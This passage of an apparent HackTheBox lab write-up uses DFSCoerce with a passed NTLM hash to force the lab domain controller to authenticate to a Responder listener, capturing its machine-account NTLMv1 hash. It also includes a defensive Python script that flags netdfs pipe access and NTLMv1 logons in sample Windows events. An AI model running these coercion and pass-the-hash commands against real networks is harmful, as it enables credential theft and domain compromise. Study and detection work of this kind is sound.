NTLM Relay via MSRPC netdfs


Another way to trigger a SYSTEM-level Net-NTLMv1 authentication to an attacker-controlled SMB server. This can be done as any regular domain user, without first elevating privileges to the henry.vinson_adm user.

Testing


┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ crackmapexec smb apt.htb.local -d HTB.LOCAL -u henry.vinson -H 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -M dfscoerce
SMB         apt.htb.local   445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:HTB.LOCAL) (signing:True) (SMBv1:True)
SMB         apt.htb.local   445    APT              [+] HTB.LOCAL\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb 
DFSCOERC... apt.htb.local   445    APT              VULNERABLE
DFSCOERC... apt.htb.local   445    APT              Next step: https://github.com/Wh04m1001/DFSCoerce

DFSCoerce


┌──(kali㉿kali)-[~/…/htb/labs/apt/DFSCoerce]
└─$ python3 dfscoerce.py 10.10.16.8 $ipv6 -d htb.local -u henry.vinson -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip $IPv6 -target-ip $IPv6
[-] connecting to ncacn_np:dead:beef::b885:d62a:d679:573f[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot 
servername:                      '10.10.16.8\x00' 
rootshare:                       'test\x00' 
apiflags:                        1 
 
 
dcerpc runtime error: code: 0x5 - rpc_s_access_denied 

Done

On Responder:

[smb] ntlmv1 client   : 10.10.10.213
[smb] ntlmv1 username : HTB\APT$
[smb] ntlmv1 hash     : APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
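A defender-side check, added here as an example (it is not part of this writeup or of the DFSCoerce tool): it scans constructed, simplified Windows security event lines for the two traces this technique leaves, a named-pipe open of netdfs on IPC$ (Event 5145, which assumes Detailed File Share auditing is enabled on the DC) and an inbound NTLM V1 logon by a machine account (Event 4624) on whatever host received the coerced authentication. The field names follow Windows' own event schema; the key=value layout and the sample values are assumptions.

```python
import re

# Constructed, simplified Windows security events (key=value form, not real log output).
# Assumes Detailed File Share auditing (5145) and logon auditing (4624) are enabled.
SAMPLE_EVENTS = [
    'EventID=5145 Computer=APT SubjectUserName=henry.vinson ShareName=\\\\*\\IPC$ '
    'RelativeTargetName=netdfs IpAddress=10.10.16.8 AccessMask=0x12019f',
    'EventID=5145 Computer=APT SubjectUserName=henry.vinson ShareName=\\\\*\\IPC$ '
    'RelativeTargetName=srvsvc IpAddress=10.10.16.8 AccessMask=0x12019f',
    'EventID=4624 Computer=FILESRV TargetUserName=APT$ TargetDomainName=HTB '
    'AuthenticationPackageName=NTLM LmPackageName="NTLM V1" IpAddress=10.10.10.213',
    'EventID=4624 Computer=FILESRV TargetUserName=jane.doe TargetDomainName=HTB '
    'AuthenticationPackageName=NTLM LmPackageName="NTLM V2" IpAddress=10.10.10.50',
]

# Named pipe abused on this page; an analyst can add other coercion pipes here.
COERCION_PIPES = {"netdfs"}
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line):
    """Turn one key=value line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def classify(ev):
    """Return a finding string for the two footprints of this technique, else None."""
    eid = ev.get("EventID")
    if (eid == "5145" and ev.get("ShareName", "").endswith("IPC$")
            and ev.get("RelativeTargetName", "").lower() in COERCION_PIPES):
        # A plain domain user opening the DFS RPC pipe on a DC is the coercion call itself.
        return (f"coercion-pipe-access pipe={ev['RelativeTargetName']} "
                f"user={ev['SubjectUserName']} src={ev['IpAddress']} host={ev['Computer']}")
    if eid == "4624" and ev.get("LmPackageName") == "NTLM V1":
        # NTLMv1 should not appear at all; a machine account ($) using it is the coerced DC.
        acct = f"{ev['TargetDomainName']}\\{ev['TargetUserName']}"
        sev = "high" if ev["TargetUserName"].endswith("$") else "medium"
        return f"ntlmv1-logon account={acct} src={ev['IpAddress']} severity={sev}"
    return None

def scan(lines):
    """Parse and classify every line, returning only the findings."""
    return [f for f in (classify(parse_event(l)) for l in lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The srvsvc and NTLM V2 lines are there to show that ordinary IPC$ traffic and modern logons are not flagged; only the netdfs open and the machine-account NTLM V1 logon produce findings.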

Moving on to cracking